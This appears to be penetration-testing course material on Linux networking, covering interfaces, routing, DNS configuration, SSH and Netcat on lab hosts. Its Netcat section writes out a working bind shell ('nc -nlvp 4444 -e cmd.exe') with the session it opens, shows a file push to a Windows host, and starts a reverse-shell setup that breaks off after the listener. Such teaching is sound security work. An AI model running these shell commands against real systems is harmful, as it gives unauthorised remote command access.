Linux Networking & Services

Essential Networking Utilities & Enumeration

ifconfig or ip addr

$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000                                                     
    link/ether 08:00:27:6b:9f:b4 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
       valid_lft 85996sec preferred_lft 85996sec
    inet6 fe80::a00:27ff:fe6b:9fb4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

Now, let's take a look at the chunks of information from the two command examples above. An important interface to recognize and get started with, is the lo interface. lo stands for loopback, which is a software interface to test the local host's network functionality.

The default IP address assigned to this interface is 127.0.0.1, also known as localhost. This means that the IP address of 127.0.0.1 is the same as localhost. This address is not routable on the internet and only pertains to the host - and not the network. Any routing that is constructed for this interface will route to itself, which can host internal resources on that machine.

The next interface that is shown in the above output is eth0 short for ethernet interface. This is the cabled connection. Linux systems utilize a device and number schema. In this case, this is the first ethernet interface. The numbers for the interfaces start at 0. This means that if another ethernet interface was added, the interface would display as eth1. This concept also applies to wireless interfaces, such as wlan. The first wireless interface would be displayed as wlan0. When you run the commands on your host, the interfaces shown may be different. The interface naming scheme covered in this module is not the only one available on Linux. Depending on the Linux flavor the default naming of the interfaces may vary.

The IP address of the host is defined next to the word inet in both utilities. ip addr shows the netmask in CIDR notation. The MAC address is shown next to the word 'ether.' The MAC address is the physical hardware address of the NIC in the host. This is burned into the chip, so this is an address that cannot be changed. This value is 6 bytes in length. In Linux, this can be seen with colon (:) delimiters separating each byte value. Each of the byte values is represented in hexidecimal. If you don't know what this means, that's ok. We'll cover hex in the 'Cryptography' portion of this course. For now, just know that the MAC address is a physical address that cannot be changed - like an IP address can be - and the value of the MAC address is a value that is 6-bytes in length.

To configure the network interfaces, the GUI can be leveraged or the /etc/network/interfaces file can be modified. In various situations, it may be important to change the IP address of your host. Such as the network you are connecting to does not have a DHCP server, the network is a local network and hard-coded for configuration purposes, to ensure that your IP remains the same, or to switch between networks - if they coexist within the same physical space.

Working with the GUI isn't always an option. Often, using the Linux Terminal is a quicker and more practical way to make configuration changes to a Linux system. Most Linux systems don't use a GUI interface. Let's take a look at how to configure a network interface through the command line.

In the Linux Terminal, let's take a look at the /etc/network/interfaces file.

$ cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

This is the original content of the /etc/network/interfaces file. Notice that there isn't a reference to eth0. This is managed by the NetworkManager by default, so writing to the /etc/network/interfaces file will override the default management and use the configuration settings specified. We can modify this file to configure a network interface by adding the following lines to the file.

allow-hotplug [interface]
iface [interface] inet static
      address [IP]
      netmask [Netmask]
      gateway [Default_Gateway]
$ cat /etc/network/interfaces
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

allow-hotplug eth0
iface eth0 inet static
      address 10.1.1.254
      netmask 255.255.255.0
      gateway 10.1.1.1

If we run 'ip addr' again, we will still have the same IP address as before our change. In the case of my host, the IP will remain as 10.0.2.15. To have the configuration changes we made take effect, we will need to take down the interface and bring it back up.

$ sudo ifdown eth0
[sudo] password for kali:

$ sudo ifup eth0

$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:6b:9f:b4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.254/24 brd 192.168.1.255 scope global eth0
       valid_lft forever preferred_lft forever

Active Connections and Neighbors (netstat -natup, ss, apr -en)

$ netstat -natup
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 10.0.2.15:53292         72.21.91.29:80          ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:53296         72.21.91.29:80          ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:48488         13.224.42.64:443        ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:58074         142.250.189.10:443      ESTABLISHED 2363/x-www-browser
tcp        0      0 10.0.2.15:41852         172.217.5.195:80        ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:55376         44.227.61.45:443        ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:50094         52.40.9.225:443         ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:36702         13.224.42.4:443         ESTABLISHED 2363/x-www-browser  
tcp        0      0 10.0.2.15:36704         13.224.42.4:443         ESTABLISHED 2363/x-www-browser  
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -            

Now, there are many connections made from our host. There are a few important TCP states that we'll need to cover. In the example above, ESTABLISHED indicates that this is an active connection. CLOSE_WAIT means that the remote end has shut down and the host is waiting for the socket to close. TIME_WAIT is when the socket is waiting after closing to handle packets still in the network. LISTENING is when the host is listening for incoming connections. SYN_SENT means the socket is actively attempting to establish a connection. This may indicate a firewall issue, as there is an attempt to establish communication, but nothing was received from that initial SYN request.

ss is the replacement for netstat and is the default on most newer Linux distributions. Ths may result in netstat not being available. The options we used for netstat are the same for ss. The output also looks very similar.

$ ss -natup
Netid             State              Recv-Q             Send-Q                          Local Address:Port                              Peer Address:Port             Process                                                
udp               UNCONN             0                  0                                     0.0.0.0:68                                     0.0.0.0:*                                                                       
tcp               ESTAB              0                  0                                   10.0.2.15:42498                           44.241.251.147:443               users:(("x-www-browser",pid=5445,fd=124))             
tcp               ESTAB              0                  0                                   10.0.2.15:53566                              72.21.91.29:80                users:(("x-www-browser",pid=5445,fd=133))             
tcp               ESTAB              0                  0                                   10.0.2.15:48764                             13.224.42.64:443               users:(("x-www-browser",pid=5445,fd=111))             
tcp               ESTAB              0                  0                                   10.0.2.15:48654                             13.224.42.85:443               users:(("x-www-browser",pid=5445,fd=105))             
tcp               ESTAB              0                  0                                   10.0.2.15:48658                             13.224.42.85:443               users:(("x-www-browser",pid=5445,fd=127))             
tcp               ESTAB              0                  0                                   10.0.2.15:48656                             13.224.42.85:443               users:(("x-www-browser",pid=5445,fd=123))   

Connections coming in or going out to other networks is a very useful piece of information to identify. This can lead to understanding interconnecting services (services or programs that work together), utilizing pivot points (hosts in a network that can be used to gain access to other parts of the network), discovering internal services (such as local web servers), and even identify any ports that are listening on a host. This information can also be used to get an idea of any firewall rules (rules that allow and/or disallow network traffic). Remote connections - or even connections to network ports are not the only valuable pieces of network information.

Learning about arp (address resolution protocol) is the beginning of understanding how Layer 2 attacks work. arp shows the connected machines on a network at the layer 2 level of the OSI model.

$  arp -en
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   4a:56:10:68:7a:8f   C                     eth0
192.168.1.67             ether   3c:16:4e:6b:57:e3   C                     eth0

The above output shows the default gateway (router) at 192.168.1.1 and one other device at 192.168.1.67 that is on the local network.

Routing and Network Troubleshooting (route, traceroute, ping)

Understanding where network traffic is going is very important in determining what can and cannot be accessed. As we covered in the Networking Topic, routes are determined by routers on the network. Although it is the job of the routers to ultimately direct the network traffic to the destination, a host must be configured to use that router as a gateway to the end network. We'll get a listing of routes by entering the 'route' command.

$ route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         10.0.2.2        0.0.0.0         UG    0      0        0 eth0
10.0.2.0        0.0.0.0         255.255.255.0   U     0      0        0 eth0

According to the output, a default route exists that will go to the router at 10.0.2.2. The default route could also be represented as 0.0.0.0. Much like the netstat and ss utilities, the -n option can be added to keep the network values from being translated from numerical format to the symbolic host names. The Destination field shows where the packets are going. In the case of the default route, any traffic that falls outside of the other defined routes will go to that router. The destination is displayed as a network IP. The Genmask field corresponds with the Destination field to define what hosts would be in this network. In this case, any traffic going to the 10.0.2.0/24 (Genmask of 255.255.255.0 in CIDR notation) network will go out the eth0 interface (Iface field). The Flags field shows that the connections are up (U) and one of them is a gateway (G). Keep in mind that routes don't necessarily need to correspond with the addressing of our host. The route command shows the routing table that is used to tell the host where to direct traffic based on the IP.

To add a route: sudo ip route add 10.13.37.0/24 dev eth1 (the IP needs to point to the gateway)

Another useful utility in troubleshooting network connections is traceroute. Traceroute is another ICMP utility. The TTL (time to live) is lengthened, compared to ping, and each hop (router) is reported back to the originating host. This is ideal when determining how many router hops are between a host and the target. It is also used to determine where a point of failure may be on a network. Each hop is a router routing the traffic to the next point in the path to get to our end goal. In this case, the goal is to reach the server that holds offensive-security.com. With that, let's run a traceroute on offensive-security.com.

$ traceroute offensive-security.com
traceroute to offensive-security.com (192.124.249.5), 30 hops max, 60 byte packets
 1  10.0.2.2 (10.0.2.2)  0.499 ms  0.471 ms  0.693 ms
 2  192.168.1.1 (192.168.1.1)  2.778 ms  3.851 ms  4.923 ms
 3  072-031-137-017.res.spectrum.com (72.31.137.17)  16.763 ms  15.757 ms  15.746 ms
 4  071-046-012-011.res.spectrum.com (71.46.12.11)  16.726 ms  17.880 ms  17.869 ms
 5  bundle-ether32.orld31-car2.bhn.net (72.31.188.150)  20.930 ms  29.556 ms  18.828 ms
 6  072-031-067-254.res.spectrum.com (72.31.67.254)  27.446 ms 072-031-220-138.res.spectrum.com (72.31.220.138)  24.700 ms  19.269 ms
 7  072-031-067-218.res.spectrum.com (72.31.67.218)  21.485 ms 072-031-220-136.res.spectrum.com (72.31.220.136)  19.317 ms 072-031-067-216.res.spectrum.com (72.31.67.216)  20.454 ms
 8  0.xe-2-2-1.pr0.atl20.tbone.rr.com (66.109.9.138)  21.440 ms
 bu-ether44.tustca4200w-bcr00.tbone.rr.com (66.109.6.128)  25.735 ms 0.xe-2-2-1.pr0.atl20.tbone.rr.com (66.109.9.138)  26.698 ms
 9  66.109.5.131 (66.109.5.131)  25.416 ms  29.801 ms
  26.884 ms
10  ae4.cr6-mia1.ip4.gtt.net (208.116.217.205)  35.165 ms  36.093 ms  36.080 ms
11  et-0-0-17.cr8-mia1.ip4.gtt.net (213.200.113.150)  31.964 ms  31.951 ms et-0-0-31.cr8-mia1.ip4.gtt.net (89.149.133.226)  30.952 ms
12  * * *
13  * * *
14  * * *
15  * * *
16  * * *
17  * * *
18  * * *
19  * * *
20  * * *
21  * * *
22  * * *
23  * * *
24  * * *
25  * * *
26  * * *
27  * * *
28  * * *
29  * * *
30  * * *

Name Resolution

Name resolution is the translation of IP addresses into a human-readable format. It is much easer to remember something like kali.org, than to remember 35.185.44.232. Sometimes, this name resolution functionality on a network will be broken and force us to use the IP instead of the name. This section will cover some critical components in the Linux system to configure name resolution on the host (whether that is to reach out to a server or to be handled locally on the machine).

The name translation mechanism is currently being handled by what is called a DNS (Domain Name System) server. This is a server that takes the human-readable name, searches a table for that name, and then points the requests for that name to the IP that is related to the human-readable name. Similar to how we look up a name in a phone book to return a phone number. With respect to Linux networking, we will identify the files that are responsible for pointing to a DNS (Domain Name System) and the local files responsible for name resolution. To begin, let's look at the /etc/resolv.conf file. The following example was taken from a default installation of Kali. The provided Kali host may appear different.

$ cat /etc/resolv.conf
domain offensive-security.com
search offensive-security.com
nameserver 192.168.1.1

If a search is done on a network that does not specify the domain name, the domain entry will be used. In this case, let's suppose that a browser is open and the user enters https://www. Since the domain was not specified in this browser search, the domain entry of offensive-security.com will be added to this search, separated by a period. This will translate to https://www.offensive-security.com/. Keep in mind that the domain entry in the example given is actually a root domain, so the translation happens in full and the site is opened.

If the domain entry is not in the configuration, the search entry will be used. There can only be one value for the domain entry, whereas the search line can have a list of domains to auto-resolve.

As was resolved by the domain entry, the same would be true in the case of the search entry line. The domain entry will take priority, so having both of these lines is redundant. If there was a need to auto-resolve to multiple domains, the search entry line should be used and the domain entry line removed. An example of this could be as follows.

$ cat /etc/resolv.conf
search offensive-security.com kali.org
nameserver 192.168.1.1

In the event the search entry line is configured as shown above, the search of tools will first check to see if there is a tools subdomain at offensive-security.com. If it is not found there, it will try the next entry and search for tools.kali.org.

I'll return the /etc/resolv.conf file back to the default configuration before continuing forward.

$ cat /etc/resolv.conf
domain offensive-security.com
search offensive-security.com
nameserver 192.168.1.1
nameserver 8.8.8.8

If the first DNS server IP fails to resolve the IP to a name, the secondary DNS set can attempt to resolve the name. Adding more nameserver entries may be useful for resolving internal resources, as well. When the need for name resolution doesn't require a full DNS server, the /etc/hosts file can be configured to do name resolutions.

$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

The first column is the IP address, and the second column is the name that will resolve to the IP. Notice that localhost is provided in two locations: the IPv4 section as 127.0.0.1 and the IPv6 section as ::1. More name entries can be provided in the same line as the IP address. An example of adding 'me' to the 127.0.0.1 IP is as follows.

$ cat /etc/hosts
127.0.0.1       localhost me
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

After this change, if we ping -c 2 me, it resolves to 127.0.0.1.

Let's discuss how that happens. The order of name resolution is handled by the /etc/nsswitch.conf (Name Service Switch) file. Let's take a look at this file.

$ cat /etc/nsswitch.conf
# /etc/nsswitch.conf
#
# Example configuration of GNU Name Service Switch functionality.
# If you have the `glibc-doc-reference' and `info' packages installed, try:
# `info libc "Name Service Switch"' for information about this file.

passwd:         files systemd
group:          files systemd
shadow:         files
gshadow:        files

hosts:          files mdns4_minimal [NOTFOUND=return] dns
networks:       files

protocols:      db files
services:       db files
ethers:         db files
rpc:            db files

netgroup:       nis

The first column is the service, and the second column is the way this service is handled. In the case for the hosts service, it is handled first by local files, then mdns4_minimal, and lastly dns. the mdns4_minimal entry is a multicast DNS resolver that will auto-populate entries with a .local TLD. If there isn't a relevant search that ends with .local, it will move on to the normal dns search. With this observation, the service related to this should first reference the /etc/hosts file that was covered previously.

Now, name resolution issues should be within your grasp to configure on a localhost. This can help when a site auto-resolves to a name, when a different name - or even an IP - was used initially. It can also make working with commonly used servers much easier. You should be able to help resolve DNS pointer issues when a localhost cannot resolve a name, as well.

Common Clients (SSH, SCP, SSHPASS)

SSH (Secure Shell Protocol) is a client/server protocol that allows for secure communications between two hosts. This communication is encrypted over the network, which telnet (another similar client utility) is not. SSH is commonly used to gain remote access into another host to either use or administer it. SSH works on TCP port 22 by default. It is a protocol that requires a form of authentication, whether that be a standard username/password or a public/private key. Let's begin looking at the general usage of ssh. In order for you to be able to follow along, let's start a local ssh server on the Kali host. Your output will look slightly different than what is shown below.

$ sudo systemctl start ssh
[sudo] password for kali: 
                                                                                                                     
$ sudo systemctl status ssh
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled)
     Active: active (running) since Mon 2021-07-12 06:59:17 MST; 8s ago
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 1327 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 1328 (sshd)
      Tasks: 1 (limit: 4631)
     Memory: 2.0M
        CPU: 19ms
     CGroup: /system.slice/ssh.service
             └─1328 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups

Jul 12 06:59:17 kali systemd[1]: Starting OpenBSD Secure Shell server...
Jul 12 06:59:17 kali sshd[1328]: Server listening on 0.0.0.0 port 22.
Jul 12 06:59:17 kali sshd[1328]: Server listening on :: port 22.
Jul 12 06:59:17 kali systemd[1]: Started OpenBSD Secure Shell server.

Often times, there will be a SSH server hosted on a different port than default. To find out how to chance this, let's take a look at the /etc/ssh/sshd_config configuration file. Note that this is not the /etc/ssh/ssh_config file. The /etc/ssh/sshd_config file is the for the ssh daemon process (the server process), whereas the /etc/ssh/ssh_config configuration file is for the ssh client.

$ cat /etc/ssh/sshd_config
#       $OpenBSD: sshd_config,v 1.103 2018/04/09 20:41:22 tj Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Include /etc/ssh/sshd_config.d/*.conf

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
---
Output trimmed
---

$ 

As shown in the output, the Port line is commented out by default. Let's uncomment this line, and change the port value to 2222.

Despite the change to the Port line, the ssh server is still available on port 22. Based on the configuration, this is not how the service should work. The issue here is that the ssh service daemon was not restarted. Let's restart the ssh service now.

$ sudo systemctl restart ssh

Now that the service is restarted, let's try to access the ssh server on the default port again.



$ ssh kali@localhost
ssh: connect to host localhost port 22: Connection refused

This is expected behavior of the ssh server. The server should be hosted on port 2222, so let's add the -p option to specify the port we want to connect to.

ssh kali@localhost -p 2222

An important directory for ssh is the .ssh directory that gets created in a user's home directory.

The first time a ssh connection is made to a host, the client (our host) will ask if we are sure we want to make the connection. When either yes or fingerprint is entered, our host will store the information to remember it next time.

Let's go into this directory and see what's in it.

$ cd .ssh

/.ssh$ ls
known_hosts

/.ssh$ cat known_hosts
|1|86RAJY3ztUa3zofzR2kK4R7oRPo=|K9hLsa9qpHg9kVcwjreC7IUr53c= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPQ3hiy42Gd1W442sy5QR+A2vhnp/xrrUn6c6X22Vl/W6437n1WuAVXHQW2gAi8Kj5q0+YmtPz/9YW5Uo4HYMmQ=
|1|wKSu7ICJF/lJuJrQBsxJ5b3a394=|28di0i+KppGoRVluQ2wCNu1V5bw= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPQ3hiy42Gd1W442sy5QR+A2vhnp/xrrUn6c6X22Vl/W6437n1WuAVXHQW2gAi8Kj5q0+YmtPz/9YW5Uo4HYMmQ=

/.ssh$

As we found, there is a file called known_hosts inside the ~/.ssh directory. This is what the prompt was adding to the kali host, when prompting for the connection. Right now, the values of this are hashed, so it is not possible for us to understand this without decoding the output. This is controlled in the client configuration file, /etc/ssh/ssh_config. Let's look at the value to control this.

/.ssh$ tail /etc/ssh/ssh_config
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
#   UserKnownHostsFile ~/.ssh/known_hosts.d/%k
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes

Let's change this value to no, clear the stored file, and try the connection again. Now, when we read the known_hosts file, we can understand more information about what connection each line refers to.

/.ssh$ cat known_hosts
[bandit.labs.overthewire.org]:2220,[176.9.9.172]:2220 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPQ3hiy42Gd1W442sy5QR+A2vhnp/xrrUn6c6X22Vl/W6437n1WuAVXHQW2gAi8Kj5q0+YmtPz/9YW5Uo4HYMmQ=

/.ssh$

The benefit of hashing the known_hosts file is in the event of a host compromise, an attacker would have a harder time gaining more information about remote systems that are being accessed from the host.

In the listing above, the first object highlighted is the connection destination and port. Since this was reached using the human-readable name (canonical name), it also translates that name to the IP address and port. The next highlighted portion of the listing shows the hashing algorithm that was used to fingerprint this host. In the case of the example, it is using the Elliptic Curve Digital Signature Algorithm with SHA-256. The last portion is the hash of the remote host in the connection. All of these objects put together make the fingerprint of the remote host.

This helps prevent eavesdropping or a rogue device by accounting for these pieces of information along with the hash value. Sometimes an internal network can have a change in the hosts IP that will affect the fingerprint of the known host. This can also happen in a lab environment.

The way to get around the error that an attack may be happening is to do one of two things: 1. Remove the known_hosts file or entry to that server in the file or 2. add the -o stricthostkeychecking=no option to the ssh command. Remember that this file is a security mechanism to prevent an unauthorized host from eavesdropping on network traffic. In real-world practice, this mechanism should not be bypassed.

Instead of changing a global configuration file that affects all users on a system, we'll look at a file that may be more relevant to a separate user account. This file is ~/.ssh/config. This is read before the /etc/ssh/ssh_config file. It is a user-defined file to handle the client configuration for a host, all hosts, or even exclude hosts. Since this is a user-defined file, it will not exist by default. Let's take a look at creating this file for the example given for bandit.labs.overthewire.org.

/.ssh$ ls -al
total 16
drwx------  2 kali kali 4096 Jul 13 03:18 .
drwxr-xr-x 19 kali kali 4096 Jul 13 03:18 ..
-rw-------  1 kali kali   75 Jul 13 03:18 config
-rw-r--r--  1 kali kali  430 Jul 13 03:16 known_hosts

/.ssh$ cat config
Host bandit
        HostName bandit.labs.overthewire.org
        User bandit0
        Port 2220
                  
kali@kali:/.ssh$

Now that an entry for bandit was made in the ~/.ssh/config file, these settings in the ssh configuration will be used when using the alias bandit. It is also important to note that this file must have 0600 (-rw-------) permissions on it. Let's run the ssh command against the alias.

/.ssh$ ssh bandit
ssh bandit                                                                 
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

[email protected]'s password:

SSH can also be used to remotely copy files, through a utility called SCP (Secure Copy Protocol). For this example, we'll shift back to the local SSH server. Let's go into the Kali user's home directory and start the SSH service again.

The syntax for scp is very similar to the cp command, except the location of the file is going to have User@host:remote-file-path.

The last thing we'll go over in the ssh portion of this section is sshpass. This utility is designed to supply the ssh password in the command execution, rather than have to manually enter it in at the prompt. This is useful in that an ssh session can be opened through a script and not require the interaction of a user. Despite the usefulness of this utility, there are severe security drawbacks. Before we get into the negatives of using sshpass, let's go over how it works, including how to install it.

$ sshpass -p 'bandit0' ssh bandit
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

Linux bandit.otw.local 5.4.8 x86_64 GNU/Linux
---
Output trimmed
---
  Enjoy your stay!

bandit0@bandit:~$ exit

/.ssh$

The ssh connection was automatically logged into with the provided password. Now that the functionality of sshpass was covered, let's look at two reasons why we may choose not to use this utility in a production environment. The first is the command history. If a user on a host is compromised, the history command can show the latest commands that were executed by that user. This can be used by an attacker to identify user credentials, other remote systems that are accessible, and even lead to full-system control by means of privilege escalation. Remember, in the Linux module of this course, the history of user commands was found by reading the ~/.zsh_history file. The history command does the same thing for the current user. Let's take a look at the latest history of the kali user, now.

ali@kali:~$ history
---
Output trimmed
---
 1008  ssh bandit
 1009  sshpass bandit0 bandit
 1010  clear
 1011  sshpass -p 'bandit0' ssh bandit

/.ssh$

In the listing above, we can find the password to the bandit host alias in plaintext. An attacker could use this information to also gain access to the remote host. The other reason is very similar to this, which is the fact an attacker could read the password in plaintext if this utility is used in a script. It is bad practice to have passwords in plaintext in any file on a system, so implementing this into a script is a bad practice.

Netcat (nc)

Netcat, first released in 1995(!) by Hobbit, is one of the "original" network penetration testing tools and is so versatile that it lives up to the author's designation as a hacker's "Swiss army knife". The clearest definition of Netcat is from Hobbit himself: a simple "utility which reads and writes data across network connections, using TCP or UDP protocols."

Connecting to a TCP/UDP Port

As suggested by the description, Netcat can run in either client or server mode. To begin, let's look at the client mode.

We can use client mode to connect to any TCP/UDP port, allowing us to:

Let's begin by using Netcat (nc) to check if TCP port 110 (the POP3 mail service) is open on one of the lab machines. We will supply several arguments: the -n option to skip DNS name resolution; -v to add some verbosity; the destination IP address; and the destination port number:

$ nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3) open
+OK POP3 server lab ready <00003.1277944@lab>

Listing 60 tells us several things. First, the TCP connection to 10.11.0.22 on port 110 (10.11.0.22:110 in standard nomenclature), succeeded, so Netcat reports the remote port as open. Next, the server responded to our connection by "talking back to us", printed out the server welcome message, and prompted us to log in, which is standard behavior for POP3 services.

Let's try to interact with the server:

$ nc -nv 10.11.0.22 110
(UNKNOWN) [10.11.0.22] 110 (pop3) open
+OK POP3 server lab ready <00004.1546827@lab>
USER offsec
+OK offsec welcome here
PASS offsec
-ERR unable to lock mailbox
quit
+OK POP3 server lab signing off.
$

Listening on a TCP/UDP Port

Listening on a TCP/UDP port using Netcat is useful for network debugging of client applications, or otherwise receiving a TCP/UDP network connection. Let's try implementing a simple chat service involving two machines, using Netcat both as a client and as a server.

On a Windows machine with IP address 10.11.0.22, we set up Netcat to listen for incoming connections on TCP port 4444. We will use the -n option to disable DNS name resolution, -l to create a listener, -v to add some verbosity, and -p to specify the listening port number:

nc -nlvp 4444

Now that we have bound port 4444 on this Windows machine to Netcat, let's connect to that port from our Linux machine and enter a line of text:

$ nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
This chat is from the linux machine

Our text will be sent to the Windows machine over TCP port 4444 and we can continue the "chat" from the Windows machine:

C:\Users\offsec> nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.11.0.22] from <UNKNOWN) [10.11.0.4] 43447
This chat is from the linux machine

This chat is from the windows machine

Transferring Files with Netcat

Netcat can also be used to transfer files, both text and binary, from one computer to another. In fact, forensics investigators often use Netcat in conjunction with dd (a disk copying utility) to create forensically sound disk images over a network.

To send a file from our Kali virtual machine to the Windows system, we initiate a setup that is similar to the previous chat example, with some slight differences. On the Windows machine, we will set up a Netcat listener on port 4444 and redirect any output into a file called incoming.exe:

C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...

On the Kali system, we will push the wget.exe file to the Windows machine through TCP port 4444:

$ locate wget.exe
/usr/share/windows-resources/binaries/wget.exe

$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [10.11.0.22] 4444 (?) open

The connection is received by Netcat on the Windows machine as shown below:

C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
connect to [10.11.0.22] from <UNKNOWN) [10.11.0.4] 43459
^C
C:\Users\offsec>

Notice that we have not received any feedback from Netcat about our file upload progress. In this case, since the file we are uploading is small, we can just wait a few seconds, then check whether the file has been fully uploaded to the Windows machine by attempting to run it:

C:\Users\offsec> incoming.exe -h
GNU Wget 1.9.1, a non-interactive network retriever.
Usage: incoming [OPTION]... [URL]...

We can see that this is, in fact, the wget.exe executable and that the file transfer was successful.

Remote Administration with Netcat

One of the most useful features of Netcat is its ability to do command redirection. The netcat-traditional version of Netcat (compiled with the "-DGAPING_SECURITY_HOLE" flag) enables the -e option, which executes a program after making or receiving a successful connection. This powerful feature opened up all sorts of interesting possibilities from a security perspective and is therefore not available in most modern Linux/BSD systems. However, due to the fact that Kali Linux is a penetration testing distribution, the Netcat version included in Kali supports the -e option.

When enabled, this option can redirect the input, output, and error messages of an executable to a TCP/UDP port rather than the default console.

For example, consider the cmd.exe executable. By redirecting stdin, stdout, and stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt on the target computer.

To clarify this, let's run through a few more scenarios involving Bob and Alice.

Netcat Bind Shell Scenario

In our first scenario, Bob (running Windows) has requested Alice's assistance (who is running Linux) and has asked her to connect to his computer and issue some commands remotely. Bob has a public IP address and is directly connected to the Internet. Alice, however, is behind a NATed connection, and has an internal IP address. To complete the scenario, Bob needs to bind cmd.exe to a TCP port on his public IP address and asks Alice to connect to his particular IP address and port.

Bob will check his local IP address, then run Netcat with the -e option to execute cmd.exe once a connection is made to the listening port:

C:\Users\offsec> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.11.0.22
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.11.0.1

C:\Users\offsec> nc -nlvp 4444 -e cmd.exe
listening on [any] 4444 ...

Now Netcat has bound TCP port 4444 to cmd.exe and will redirect any input, output, or error messages from cmd.exe to the network. In other words, anyone connecting to TCP port 4444 on Bob's machine (hopefully Alice) will be presented with Bob's command prompt. This is indeed a "gaping security hole"!

$ ip address show eth0 | grep inet
          inet 10.11.0.4/16  brd 10.11.255.255  scope global dynamic eth0
          
$ nc -nv 10.11.0.22 4444
(UNKNOWN) [10.11.0.22] 4444 (?) open
Microsoft Windows [Version 10.0.17134.590]
(c) 2018 Microsoft Corporation. All rights reserved.


C:\Users\offsec> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.11.0.22
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.11.0.1

Reverse Shell Scenario

In our second scenario, Alice needs help from Bob. However, Alice has no control over the router in her office, and therefore cannot forward traffic from the router to her internal machine.

In this scenario, we can leverage another useful feature of Netcat; the ability to send a command shell to a host listening on a specific port. In this situation, although Alice cannot bind a port to /bin/bash locally on her computer and expect Bob to connect, she can send control of her command prompt to Bob's machine instead. This is known as a reverse shell. To get this working, Bob will first set up Netcat to listen for an incoming shell. We will use port 4444 in our example:

C:\Users\offsec> nc -nlvp 4444
listening on [any] 4444 ...

